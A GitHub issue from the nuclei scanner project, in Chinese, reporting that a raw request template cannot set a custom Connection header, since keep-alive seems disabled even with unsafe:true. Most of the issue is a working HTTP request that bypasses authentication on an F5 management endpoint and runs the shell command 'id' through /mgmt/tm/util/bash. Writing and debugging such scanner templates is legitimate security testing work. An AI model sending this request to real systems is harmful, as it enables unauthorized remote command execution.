### ISSUE TITLE
Connection 字段无法定义

### ISSUE THREAD

**Issue by Henry4E36** [projectdiscovery/nuclei#1972]
```
requests:
  - raw:
    - |
      POST /mgmt/tm/util/bash HTTP/1.1
      Host: {{hostname}}
      X-F5-Auth-Token: a
      Connection: keep-alive, x-F5-Auth-Token
      Authorization: Basic YWRtaW46
      Content-Type: application/json
    

      {"command": "run", "utilCmdArgs": "-c id"}
```
使用nuclei进行验证后，发现connnection字段无法定义，源码中好像是默认关闭了keep-alive，使用了unsafe:true,仍然返回的是connection:close.
